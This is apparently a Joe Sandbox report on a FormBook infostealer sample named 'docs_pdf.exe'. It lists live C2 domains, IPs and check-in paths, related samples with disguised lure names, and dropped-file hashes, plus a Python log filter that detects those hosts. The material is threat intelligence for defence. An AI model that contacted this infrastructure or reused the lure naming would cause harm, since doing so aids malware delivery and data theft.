https://www.hprlz.cz/w6qg/?Y2AhR=fDNdZPHH1hsp8rrp&tDA=0lpTRQcDUH | clip.exe, 00000003.00000002.2916160322.0000000005264000.00000004.10000000.00040000.00000000.sdmp, qsWkdNJOHuxNQUCXoUm.exe, 00000007.00000002.2915456645.0000000002E54000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.2121303941.0000000005D34000.00000004.80000000.00040000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://ac.ecosia.org/autocomplete?q= | clip.exe, 00000003.00000002.2917722091.0000000007C0E000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://static.loopia.se/responsive/images/iOS-57.png | clip.exe, 00000003.00000002.2916160322.0000000005D62000.00000004.10000000.00040000.00000000.sdmp, clip.exe, 00000003.00000002.2917578527.00000000078F0000.00000004.00000800.00020000.00000000.sdmp, qsWkdNJOHuxNQUCXoUm.exe, 00000007.00000002.2915456645.0000000003952000.00000004.00000001.00040000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://i2.cdn-image.com/__media__/pics/10667/netsol-logos-2020-165-50.jpg | clip.exe, 00000003.00000002.2916160322.00000000058AC000.00000004.10000000.00040000.00000000.sdmp, clip.exe, 00000003.00000002.2917578527.00000000078F0000.00000004.00000800.00020000.00000000.sdmp, qsWkdNJOHuxNQUCXoUm.exe, 00000007.00000002.2915456645.000000000349C000.00000004.00000001.00040000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://i2.cdn-image.com/__media__/pics/29590/bg1.png) | clip.exe, 00000003.00000002.2916160322.00000000058AC000.00000004.10000000.00040000.00000000.sdmp, clip.exe, 00000003.00000002.2917578527.00000000078F0000.00000004.00000800.00020000.00000000.sdmp, qsWkdNJOHuxNQUCXoUm.exe, 00000007.00000002.2915456645.000000000349C000.00000004.00000001.00040000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://i2.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.ttf | clip.exe, 00000003.00000002.2916160322.00000000058AC000.00000004.10000000.00040000.00000000.sdmp, clip.exe, 00000003.00000002.2917578527.00000000078F0000.00000004.00000800.00020000.00000000.sdmp, qsWkdNJOHuxNQUCXoUm.exe, 00000007.00000002.2915456645.000000000349C000.00000004.00000001.00040000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://www.bfiworkerscomp.com/Dream_Job_Search.cfm?fp=4x%2Bj9sdm3eC7HUqiUq%2FlUrOWlceBTk4Vo1G%2F%2Bt | clip.exe, 00000003.00000002.2916160322.00000000058AC000.00000004.10000000.00040000.00000000.sdmp, clip.exe, 00000003.00000002.2917578527.00000000078F0000.00000004.00000800.00020000.00000000.sdmp, qsWkdNJOHuxNQUCXoUm.exe, 00000007.00000002.2915456645.000000000349C000.00000004.00000001.00040000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://i2.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.ttf | clip.exe, 00000003.00000002.2916160322.00000000058AC000.00000004.10000000.00040000.00000000.sdmp, clip.exe, 00000003.00000002.2917578527.00000000078F0000.00000004.00000800.00020000.00000000.sdmp, qsWkdNJOHuxNQUCXoUm.exe, 00000007.00000002.2915456645.000000000349C000.00000004.00000001.00040000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://www.loopia.com/sitebuilder/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=pa | clip.exe, 00000003.00000002.2916160322.0000000005D62000.00000004.10000000.00040000.00000000.sdmp, clip.exe, 00000003.00000002.2917578527.00000000078F0000.00000004.00000800.00020000.00000000.sdmp, qsWkdNJOHuxNQUCXoUm.exe, 00000007.00000002.2915456645.0000000003952000.00000004.00000001.00040000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://i2.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.svg#montserrat-bold | clip.exe, 00000003.00000002.2916160322.00000000058AC000.00000004.10000000.00040000.00000000.sdmp, clip.exe, 00000003.00000002.2917578527.00000000078F0000.00000004.00000800.00020000.00000000.sdmp, qsWkdNJOHuxNQUCXoUm.exe, 00000007.00000002.2915456645.000000000349C000.00000004.00000001.00040000.00000000.sdmp | false |
                              • Avira URL Cloud: safe
                              unknown
                              https://www.loopia.com/domainnames/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=paclip.exe, 00000003.00000002.2916160322.0000000005D62000.00000004.10000000.00040000.00000000.sdmp, clip.exe, 00000003.00000002.2917578527.00000000078F0000.00000004.00000800.00020000.00000000.sdmp, qsWkdNJOHuxNQUCXoUm.exe, 00000007.00000002.2915456645.0000000003952000.00000004.00000001.00040000.00000000.sdmpfalse
                              • Avira URL Cloud: safe
                              unknown
                              http://i2.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.woffclip.exe, 00000003.00000002.2916160322.00000000058AC000.00000004.10000000.00040000.00000000.sdmp, clip.exe, 00000003.00000002.2917578527.00000000078F0000.00000004.00000800.00020000.00000000.sdmp, qsWkdNJOHuxNQUCXoUm.exe, 00000007.00000002.2915456645.000000000349C000.00000004.00000001.00040000.00000000.sdmpfalse
                              • Avira URL Cloud: safe
                              unknown
                              http://i2.cdn-image.com/__media__/js/min.js?v2.3clip.exe, 00000003.00000002.2916160322.00000000058AC000.00000004.10000000.00040000.00000000.sdmp, clip.exe, 00000003.00000002.2917578527.00000000078F0000.00000004.00000800.00020000.00000000.sdmp, qsWkdNJOHuxNQUCXoUm.exe, 00000007.00000002.2915456645.000000000349C000.00000004.00000001.00040000.00000000.sdmpfalse
                              • Avira URL Cloud: safe
                              unknown
                              https://www.loopia.com/hosting/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkinclip.exe, 00000003.00000002.2916160322.0000000005D62000.00000004.10000000.00040000.00000000.sdmp, clip.exe, 00000003.00000002.2917578527.00000000078F0000.00000004.00000800.00020000.00000000.sdmp, qsWkdNJOHuxNQUCXoUm.exe, 00000007.00000002.2915456645.0000000003952000.00000004.00000001.00040000.00000000.sdmpfalse
                              • Avira URL Cloud: safe
                              unknown
                              http://www.bfiworkerscomp.com/Discussion_Forums.cfm?fp=4x%2Bj9sdm3eC7HUqiUq%2FlUrOWlceBTk4Vo1G%2F%2Bclip.exe, 00000003.00000002.2916160322.00000000058AC000.00000004.10000000.00040000.00000000.sdmp, clip.exe, 00000003.00000002.2917578527.00000000078F0000.00000004.00000800.00020000.00000000.sdmp, qsWkdNJOHuxNQUCXoUm.exe, 00000007.00000002.2915456645.000000000349C000.00000004.00000001.00040000.00000000.sdmpfalse
                              • Avira URL Cloud: safe
                              unknown
                              http://www.bfiworkerscomp.com/Alternative_Financing.cfm?fp=4x%2Bj9sdm3eC7HUqiUq%2FlUrOWlceBTk4Vo1G%2clip.exe, 00000003.00000002.2916160322.00000000058AC000.00000004.10000000.00040000.00000000.sdmp, clip.exe, 00000003.00000002.2917578527.00000000078F0000.00000004.00000800.00020000.00000000.sdmp, qsWkdNJOHuxNQUCXoUm.exe, 00000007.00000002.2915456645.000000000349C000.00000004.00000001.00040000.00000000.sdmpfalse
                              • Avira URL Cloud: safe
                              unknown
                              https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=clip.exe, 00000003.00000002.2917722091.0000000007C0E000.00000004.00000020.00020000.00000000.sdmpfalse
                              • URL Reputation: safe
                              unknown
                              https://www.loopia.com/woocommerce/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=paclip.exe, 00000003.00000002.2916160322.0000000005D62000.00000004.10000000.00040000.00000000.sdmp, clip.exe, 00000003.00000002.2917578527.00000000078F0000.00000004.00000800.00020000.00000000.sdmp, qsWkdNJOHuxNQUCXoUm.exe, 00000007.00000002.2915456645.0000000003952000.00000004.00000001.00040000.00000000.sdmpfalse
                              • Avira URL Cloud: safe
                              unknown
                              https://www.loopia.se?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkingwebclip.exe, 00000003.00000002.2916160322.0000000005D62000.00000004.10000000.00040000.00000000.sdmp, clip.exe, 00000003.00000002.2917578527.00000000078F0000.00000004.00000800.00020000.00000000.sdmp, qsWkdNJOHuxNQUCXoUm.exe, 00000007.00000002.2915456645.0000000003952000.00000004.00000001.00040000.00000000.sdmpfalse
                              • Avira URL Cloud: safe
                              unknown
                              http://i2.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.eot?#iefixclip.exe, 00000003.00000002.2916160322.00000000058AC000.00000004.10000000.00040000.00000000.sdmp, clip.exe, 00000003.00000002.2917578527.00000000078F0000.00000004.00000800.00020000.00000000.sdmp, qsWkdNJOHuxNQUCXoUm.exe, 00000007.00000002.2915456645.000000000349C000.00000004.00000001.00040000.00000000.sdmpfalse
                              • Avira URL Cloud: safe
                              unknown
                              http://www.bfiworkerscomp.com/__media__/js/trademark.php?d=bfiworkerscomp.com&type=nsclip.exe, 00000003.00000002.2916160322.00000000058AC000.00000004.10000000.00040000.00000000.sdmp, clip.exe, 00000003.00000002.2917578527.00000000078F0000.00000004.00000800.00020000.00000000.sdmp, qsWkdNJOHuxNQUCXoUm.exe, 00000007.00000002.2915456645.000000000349C000.00000004.00000001.00040000.00000000.sdmpfalse
                              • Avira URL Cloud: safe
                              unknown
IP | Domain | Country | ASN | ASN Name | Malicious
194.9.94.85 | www.xn--matfrmn-jxa4m.se | Sweden | 39570 | LOOPIASE | true
5.44.111.162 | www.hprlz.cz | Germany | 45031 | PROVIDERBOXIPv4IPv6DUS1DE | false
217.160.0.106 | www.catherineviskadi.com | Germany | 8560 | ONEANDONE-ASBrauerstrasse48DE | true
208.91.197.27 | www.bfiworkerscomp.com | Virgin Islands (BRITISH) | 40034 | CONFLUENCE-NETWORK-INCVG | true
43.252.167.188 | www.xn--fhq1c541j0zr.com | Hong Kong | 38277 | CLINK-AS-APCommuniLinkInternetLimitedHK | true
                              Joe Sandbox version:40.0.0 Tourmaline
                              Analysis ID:1472520
                              Start date and time:2024-07-13 00:06:10 +02:00
                              Joe Sandbox product:CloudBasic
                              Overall analysis duration:0h 9m 15s
                              Hypervisor based Inspection enabled:false
                              Report type:full
                              Cookbook file name:default.jbs
                              Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed:8
                              Number of new started drivers analysed:0
                              Number of existing processes analysed:0
                              Number of existing drivers analysed:0
                              Number of injected processes analysed:2
                              Technologies:
                              • HCA enabled
                              • EGA enabled
                              • AMSI enabled
                              Analysis Mode:default
                              Analysis stop reason:Timeout
                              Sample name:docs_pdf.exe
                              Detection:MAL
                              Classification:mal100.troj.spyw.evad.winEXE@7/5@9/5
                              EGA Information:
                              • Successful, ratio: 75%
                              HCA Information:
                              • Successful, ratio: 97%
                              • Number of executed functions: 58
                              • Number of non-executed functions: 268
                              Cookbook Comments:
                              • Found application associated with file extension: .exe
• Excluded processes from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
                              • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                              • Execution Graph export aborted for target qsWkdNJOHuxNQUCXoUm.exe, PID 5788 because it is empty
• Not all processes were analyzed, report is missing behavior information
                              • Report creation exceeded maximum time and may have missing disassembly code information.
                              • Report size exceeded maximum capacity and may have missing disassembly code.
                              • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                              • VT rate limit hit for: docs_pdf.exe
Time | Type | Description
18:07:53 | API Interceptor | 3677328x Sleep call for process: clip.exe modified
Match | Associated Sample Name / URL | Detection | Threat Name | Context
194.9.94.85 | TOgpmvvWoj.exe | malicious | FormBook | www.xn--matfrmn-jxa4m.se/4hda/
194.9.94.85 | Attendance list.exe | malicious | FormBook | www.xn--matfrmn-jxa4m.se/4hda/
194.9.94.85 | Navana Pharmaceuticals PLC.pdf.exe | malicious | FormBook | www.xn--matfrmn-jxa4m.se/5m4b/
194.9.94.85 | Arrival Notice.bat.exe | malicious | FormBook | www.torentreprenad.com/r45o/
194.9.94.85 | Arrival Notice.bat.exe | malicious | FormBook | www.torentreprenad.com/r45o/
194.9.94.85 | TKHA-A88163341B.bat.exe | malicious | FormBook | www.torentreprenad.com/r45o/
194.9.94.85 | ORDER TKHA-A88163341B.bat.exe | malicious | FormBook | www.torentreprenad.com/r45o/
194.9.94.85 | D7KV2Z73zC.rtf | malicious | FormBook | www.xn--matfrmn-jxa4m.se/ufuh/
194.9.94.85 | Scan Doc.docx.doc | malicious | FormBook | www.xn--matfrmn-jxa4m.se/ufuh/
194.9.94.85 | Arrival Notice.bat.exe | malicious | FormBook | www.torentreprenad.com/r45o/
5.44.111.162 | TOgpmvvWoj.exe | malicious | FormBook | (none)
5.44.111.162 | Attendance list.exe | malicious | FormBook | (none)
217.160.0.106 | TOgpmvvWoj.exe | malicious | FormBook | www.catherineviskadi.com/qe66/
217.160.0.106 | Attendance list.exe | malicious | FormBook | www.catherineviskadi.com/qe66/
217.160.0.106 | 7cQuHxOrXh.exe | malicious | FormBook | www.terra-kapitalverwaltung.com/7bun/?lD=Dzsf9gxMzVcvGIFtv1zB+zNDsuRm/B8MqjmeJjDZObJZKKS92slBOYXNZcr4WOQLhaYS&8p=WFQ8pNmXe
217.160.0.106 | SUNEJ PAYMENT.exe | malicious | FormBook | www.stellantis-luxury-rent.com/m8ec/?DzrLW=VDKPcpdPnjE8Qb&ETRTzvU=lcRCED8mwam0j8rsNaeftt771GynQIE0hliVmee3NCJmmxoaoA4WDFL7Jc4nyizrq2kx
208.91.197.27 | TOgpmvvWoj.exe | malicious | FormBook | www.bfiworkerscomp.com/xzzi/
208.91.197.27 | Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe | malicious | FormBook | www.thesprinklesontop.com/n12h/
208.91.197.27 | Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe | malicious | FormBook | www.thesprinklesontop.com/n12h/
208.91.197.27 | Attendance list.exe | malicious | FormBook | www.bfiworkerscomp.com/xzzi/
208.91.197.27 | Fiyat ARH-4532817-PO 45328174563.exe | malicious | FormBook | www.thesprinklesontop.com/n12h/
208.91.197.27 | Fiyat ARH-4532817-PO 45328174563.exe | malicious | FormBook | www.thesprinklesontop.com/n12h/
208.91.197.27 | KALIANDRA SETYATAMA PO 1310098007.exe | malicious | FormBook | www.thesprinklesontop.com/n12h/
208.91.197.27 | Swift Copy #U00a362,271.03.Pdf.exe | malicious | FormBook | www.findyourwalden.online/w923/
208.91.197.27 | PO-104678522.exe | malicious | FormBook | www.findyourwalden.online/w923/
208.91.197.27 | NEW ORDER-RFQ#10112023Q4.exe | malicious | FormBook | www.findyourwalden.online/w923/
Match | Associated Sample Name / URL | Detection | Threat Name | Context
www.bfiworkerscomp.com | TOgpmvvWoj.exe | malicious | FormBook | 208.91.197.27
www.bfiworkerscomp.com | Attendance list.exe | malicious | FormBook | 208.91.197.27
www.anuts.top | TOgpmvvWoj.exe | malicious | FormBook | 23.251.54.212
www.anuts.top | Attendance list.exe | malicious | FormBook | 23.251.54.212
www.anuts.top | 2OdHcYtYOMOepjD.exe | malicious | FormBook | 23.251.54.212
www.anuts.top | Tekstlinie.vbs | malicious | FormBook, GuLoader | 23.251.54.212
www.anuts.top | Purchase order.pdf.exe | malicious | FormBook | 23.251.54.212
www.anuts.top | dMY6QiHAIpPPqiV.exe | malicious | FormBook | 23.251.54.212
www.anuts.top | Purchase order.pdf.exe | malicious | FormBook | 23.251.54.212
www.anuts.top | UNIVERSITY OF_ SHARJAH- Project FMD20240342_pdf.exe | malicious | FormBook | 23.251.54.212
www.anuts.top | 33BMmt58Bj.exe | malicious | FormBook | 23.251.54.212
www.anuts.top | Payment_Advice.pdf.vbs | malicious | FormBook, GuLoader | 23.251.54.212
www.xn--fhq1c541j0zr.com | TOgpmvvWoj.exe | malicious | FormBook | 43.252.167.188
www.xn--fhq1c541j0zr.com | Attendance list.exe | malicious | FormBook | 43.252.167.188
www.xn--fhq1c541j0zr.com | Lowe_list0605002024.bat.exe | malicious | FormBook, GuLoader | 43.252.167.188
www.xn--matfrmn-jxa4m.se | TOgpmvvWoj.exe | malicious | FormBook | 194.9.94.85
www.xn--matfrmn-jxa4m.se | Attendance list.exe | malicious | FormBook | 194.9.94.85
www.xn--matfrmn-jxa4m.se | Navana Pharmaceuticals PLC.pdf.exe | malicious | FormBook | 194.9.94.85
www.xn--matfrmn-jxa4m.se | D7KV2Z73zC.rtf | malicious | FormBook | 194.9.94.85
www.xn--matfrmn-jxa4m.se | Scan Doc.docx.doc | malicious | FormBook | 194.9.94.85
www.xn--matfrmn-jxa4m.se | BASF Purchase Order.doc | malicious | FormBook | 194.9.94.86
www.xn--matfrmn-jxa4m.se | SecuriteInfo.com.Win32.PWSX-gen.24627.22980.exe | malicious | FormBook | 194.9.94.85
www.xn--matfrmn-jxa4m.se | product Inquiry and RFQ ART LTD.doc | malicious | FormBook | 194.9.94.85
www.xn--matfrmn-jxa4m.se | New Order.doc | malicious | FormBook | 194.9.94.85
www.xn--matfrmn-jxa4m.se | GXu0Ow8T1h.exe | malicious | FormBook | 194.9.94.85
www.hprlz.cz | TOgpmvvWoj.exe | malicious | FormBook | 5.44.111.162
www.hprlz.cz | Attendance list.exe | malicious | FormBook | 5.44.111.162
www.catherineviskadi.com | TOgpmvvWoj.exe | malicious | FormBook | 217.160.0.106
www.catherineviskadi.com | Attendance list.exe | malicious | FormBook | 217.160.0.106
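The correlation tables above show the same FormBook check-in infrastructure reused across many submitted samples, and every context entry begins with a short alphanumeric directory (/4hda/, /xzzi/, /qe66/, /n12h/, /w923/). As an added example, not part of the Joe Sandbox report, the Python below turns those observations into a log filter: it parses a constructed proxy-log format, matches hosts and server IPs against the rows this report marks Malicious=true, treats the path shape only as corroboration, and deliberately leaves out www.hprlz.cz / 5.44.111.162, which the IP table marks false. The log line format, the client and non-report server addresses, and the sample lines are constructed for the example; the indicator values come from this report.

```python
"""Filter HTTP/proxy log lines against the infrastructure this report marks malicious.

Added example for this report page, not Joe Sandbox output. The IOC values are
taken from the report's IP table (Malicious=true rows) and context columns; the
log line format and the sample lines are constructed for the example.
"""
import re
from typing import List, NamedTuple, Optional, Tuple

# Hosts and IPs from the report's IP table with Malicious=true. www.hprlz.cz /
# 5.44.111.162 is marked false there and is deliberately not included.
C2_HOSTS = {
    "www.xn--matfrmn-jxa4m.se",
    "www.catherineviskadi.com",
    "www.bfiworkerscomp.com",
    "www.xn--fhq1c541j0zr.com",
}
C2_IPS = {"194.9.94.85", "217.160.0.106", "208.91.197.27", "43.252.167.188"}

# Every context entry in the correlation tables starts with a short alphanumeric
# directory (/4hda/, /xzzi/, /qe66/, /n12h/, /w923/, ...); this generalises that.
C2_PATH = re.compile(r"^/[a-z0-9]{4}/")

# Constructed log format: "<timestamp> <client-ip> <method> <url> <server-ip> <status>"
LOG_LINE = re.compile(
    r"^(?P<ts>\S+) (?P<src>\S+) (?P<method>[A-Z]+) (?P<url>\S+) (?P<dst>\S+) (?P<status>\d{3})$"
)
URL = re.compile(r"^https?://(?P<host>[^/:?#]+)(?::\d+)?(?P<path>/[^?#]*)?")


class Hit(NamedTuple):
    ts: str
    src: str
    url: str
    reasons: Tuple[str, ...]


def classify(line: str) -> Optional[Hit]:
    """Return a Hit naming the indicators a line matched, or None if it matched nothing."""
    m = LOG_LINE.match(line.strip())
    if not m:
        return None
    u = URL.match(m["url"])
    if not u:
        return None
    host = u["host"].lower()
    path = u["path"] or "/"
    reasons = []
    if host in C2_HOSTS:
        reasons.append("c2-domain")
    if m["dst"] in C2_IPS:
        reasons.append("c2-ip")
    # The path shape alone is weak evidence (many sites have four-character
    # directories), so it is only reported as corroboration of a host/IP match.
    if reasons and C2_PATH.match(path):
        reasons.append("c2-path-shape")
    return Hit(m["ts"], m["src"], m["url"], tuple(reasons)) if reasons else None


def scan(lines: List[str]) -> List[Hit]:
    return [hit for hit in map(classify, lines) if hit is not None]


# Constructed sample traffic (client 10.0.0.23 is the infected host in this
# scenario; server IPs for non-report hosts are from the TEST-NET ranges):
# two FormBook check-ins to infrastructure from the report, a fetch of a
# parking-page asset the report lists as safe, a request to the domain the
# report marks Malicious=false, and an unrelated request.
SAMPLE_LOGS = [
    "2024-07-13T00:07:53Z 10.0.0.23 GET http://www.bfiworkerscomp.com/xzzi/ 208.91.197.27 200",
    "2024-07-13T00:07:54Z 10.0.0.23 GET http://i2.cdn-image.com/__media__/js/min.js?v2.3 198.51.100.7 200",
    "2024-07-13T00:08:10Z 10.0.0.23 POST http://www.xn--matfrmn-jxa4m.se/4hda/ 194.9.94.85 200",
    "2024-07-13T00:08:11Z 10.0.0.23 GET http://www.hprlz.cz/ 5.44.111.162 200",
    "2024-07-13T00:09:00Z 10.0.0.42 GET https://www.example.com/index.html 203.0.113.10 200",
]

if __name__ == "__main__":
    for hit in scan(SAMPLE_LOGS):
        print(hit.ts, hit.src, hit.url, ",".join(hit.reasons))
```

Run as a script it reports the two check-ins and nothing else; the cdn-image.com asset is skipped because neither its host nor its server IP is in the report's malicious set, which is the same split the URL table above makes between parking-page resources (all marked safe) and the resolved C2 hosts.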
Match | Associated Sample Name / URL | Detection | Threat Name | Context
PROVIDERBOXIPv4IPv6DUS1DE | TOgpmvvWoj.exe | malicious | FormBook | 5.44.111.162
PROVIDERBOXIPv4IPv6DUS1DE | Attendance list.exe | malicious | FormBook | 5.44.111.162
PROVIDERBOXIPv4IPv6DUS1DE | 62c.js | malicious | Unknown | 5.44.111.28
PROVIDERBOXIPv4IPv6DUS1DE | 62c.js | malicious | Unknown | 5.44.111.28
PROVIDERBOXIPv4IPv6DUS1DE | z8s945rPmZ.exe | malicious | SystemBC | 5.44.111.104
PROVIDERBOXIPv4IPv6DUS1DE | JJUmnnkIxSCyKik.exe | malicious | FormBook, PureLog Stealer | 93.90.186.43
PROVIDERBOXIPv4IPv6DUS1DE | De0RycaUHH.exe | malicious | LummaC, Glupteba, LummaC Stealer, SmokeLoader, Stealc | 5.44.111.109
PROVIDERBOXIPv4IPv6DUS1DE | 27i42a6Qag.exe | malicious | Glupteba, LummaC Stealer, Petite Virus, RedLine, SmokeLoader | 128.127.69.76
PROVIDERBOXIPv4IPv6DUS1DE | Wp2jiU6tOK.elf | malicious | Mirai | 5.44.126.213
PROVIDERBOXIPv4IPv6DUS1DE | tSPx13a2fq.elf | malicious | Mirai, Moobot | 5.44.126.228
ONEANDONE-ASBrauerstrasse48DE | IMG_00110724.exe | malicious | FormBook | 217.160.230.215
ONEANDONE-ASBrauerstrasse48DE | SecuriteInfo.com.Trojan.AutoIt.1410.27475.23700.exe | malicious | FormBook | 212.227.172.254
ONEANDONE-ASBrauerstrasse48DE | SecuriteInfo.com.Win32.Malware-gen.27540.30253.exe | malicious | Unknown | 217.160.0.130
ONEANDONE-ASBrauerstrasse48DE | SecuriteInfo.com.Win32.Malware-gen.27540.30253.exe | malicious | Unknown | 217.160.0.130
ONEANDONE-ASBrauerstrasse48DE | http://mon-intranet.fr/ | malicious | Unknown | 217.160.0.161
ONEANDONE-ASBrauerstrasse48DE | https://gfaal.com/ | malicious | Unknown | 74.208.236.213
ONEANDONE-ASBrauerstrasse48DE | https://booking.inn-5781.eu/confirm/login/wzpCayeU | malicious | Unknown | 212.227.67.33
ONEANDONE-ASBrauerstrasse48DE | SecuriteInfo.com.Win32.PWSX-gen.17883.22231.exe | malicious | FormBook | 217.160.230.215
ONEANDONE-ASBrauerstrasse48DE | https://hotel-id637438.eu/sign-in | malicious | Unknown | 212.227.67.33
ONEANDONE-ASBrauerstrasse48DE | DRAFT CONTRACT COPY_938840.scr | malicious | FormBook | 217.160.0.42
CONFLUENCE-NETWORK-INCVG | https://www.searchvity.com | malicious | Unknown | 208.91.196.46
CONFLUENCE-NETWORK-INCVG | http://74.220.199.9 | malicious | Phisher | 208.91.196.253
CONFLUENCE-NETWORK-INCVG | http://www.welcome2oklahoma.com/Welcome2Oklahoma/Oklahoma%20Towns/Chandler/El%20Indio%20Mexican%20Restaurant/El%20Indio%20Mexican%20Restaurant.htm/ | malicious | Unknown | 208.91.196.253
CONFLUENCE-NETWORK-INCVG | PRE-ALERT HTHC22031529.exe | malicious | FormBook | 204.11.56.48
CONFLUENCE-NETWORK-INCVG | http://le100.net | malicious | Unknown | 208.91.196.253
CONFLUENCE-NETWORK-INCVG | Order 81307529516.LZ.exe | malicious | FormBook | 204.11.56.48
CONFLUENCE-NETWORK-INCVG | TOgpmvvWoj.exe | malicious | FormBook | 208.91.197.27
CONFLUENCE-NETWORK-INCVG | Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exe | malicious | FormBook | 208.91.197.13
CONFLUENCE-NETWORK-INCVG | spec 4008670601 AZTEK Order.exe | malicious | FormBook | 208.91.197.13
CONFLUENCE-NETWORK-INCVG | Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe | malicious | FormBook | 208.91.197.27
LOOPIASE | TOgpmvvWoj.exe | malicious | FormBook | 194.9.94.85
LOOPIASE | Attendance list.exe | malicious | FormBook | 194.9.94.85
LOOPIASE | Navana Pharmaceuticals PLC.pdf.exe | malicious | FormBook | 194.9.94.85
LOOPIASE | Arrival Notice.bat.exe | malicious | FormBook | 194.9.94.86
LOOPIASE | Arrival Notice.bat.exe | malicious | FormBook | 194.9.94.85
LOOPIASE | Arrival Notice.bat.exe | malicious | FormBook | 194.9.94.85
LOOPIASE | TKHA-A88163341B.bat.exe | malicious | FormBook | 194.9.94.85
LOOPIASE | ORDER TKHA-A88163341B.bat.exe | malicious | FormBook | 194.9.94.85
LOOPIASE | c5018a3915e8a9de41e083f7936c2d232b9a73ba41c8c07fb7b2d90d5f5d8e8e_dump.exe | malicious | SystemBC | 93.188.3.13
LOOPIASE | D7KV2Z73zC.rtf | malicious | FormBook | 194.9.94.85
                                  No context
                                  No context
                                  Process:C:\Windows\SysWOW64\clip.exe
                                  File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                  Category:dropped
                                  Size (bytes):114688
                                  Entropy (8bit):0.9746603542602881
                                  Encrypted:false
                                  SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                  MD5:780853CDDEAEE8DE70F28A4B255A600B
                                  SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                  SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                  SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                  Malicious:false
                                  Reputation:high, very likely benign file
                                  Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                  Process:C:\Users\user\Desktop\docs_pdf.exe
                                  File Type:data
                                  Category:dropped
                                  Size (bytes):270848
                                  Entropy (8bit):7.994909580334422
                                  Encrypted:true
                                  SSDEEP:6144:Pxb/88Gf9W9tZutJQJa1/Ha5fnW8OKvtOzK4/cEa9GCOsFWmLevw:x3Go9tZutaYxSfWtKCcE5COswmLb
                                  MD5:62135523FE6225338817A98FCAC04060
                                  SHA1:EE93072A25438379CE698053B1E47D101F87BF20
                                  SHA-256:2D9D8BE609E3CC293C3C66B745AAB918E43C5CF592B8BE0493CE3CD51AA78077
                                  SHA-512:E53F7ECB9D971EFA11384345965E8F00D8073530D5550E26B7B18F39FCB0ED577C809595265D865B4F5B6269FE477E76BEAB3A76EC234F1F621C0FF845A6EA19
                                  Malicious:false
                                  Reputation:low
Preview:.....A9KW..Y...k.K@...a4I..ERFPGMX2WUKCJBBI7A9KWERFPGMX2W.KCJL].9A.B.d.G..l.Z>&k38-%;V,.(6+<)$g/=.% %c#,b.x..&8!7h]JG|2WUKCJB;H>..+0.o&7.p8U.O..x"..[..y2!.]...k5,..+!!.!^.WERFPGMXb.UK.KCBXnyYKWERFPGM.2UT@BABBY3A9KWERFPGmM2WU[CJBbM7A9.WEBFPGOX2QUKCJBBI1A9KWERFPgIX2UUKCJBBK7..KWURF@GMX2GUKSJBBI7A)KWERFPGMX2WUKCJBBI7A9KWERFPGMX2WUKCJBBI7A9KWERFPGMX2WUKCJBBI7A9KWERFPGMX2WUKCJBBI7A9KWERFPGMX2WUKCJBBI7A9KWERFPGMX2WUKCJBBI7A9KWERF~
                                  Process:C:\Users\user\Desktop\docs_pdf.exe
                                  File Type:data
                                  Category:dropped
                                  Size (bytes):270848
                                  Entropy (8bit):7.994909580334422
                                  Encrypted:true
                                  SSDEEP:6144:Pxb/88Gf9W9tZutJQJa1/Ha5fnW8OKvtOzK4/cEa9GCOsFWmLevw:x3Go9tZutaYxSfWtKCcE5COswmLb
                                  MD5:62135523FE6225338817A98FCAC04060
                                  SHA1:EE93072A25438379CE698053B1E47D101F87BF20
                                  SHA-256:2D9D8BE609E3CC293C3C66B745AAB918E43C5CF592B8BE0493CE3CD51AA78077
                                  SHA-512:E53F7ECB9D971EFA11384345965E8F00D8073530D5550E26B7B18F39FCB0ED577C809595265D865B4F5B6269FE477E76BEAB3A76EC234F1F621C0FF845A6EA19
                                  Malicious:false
                                  Reputation:low
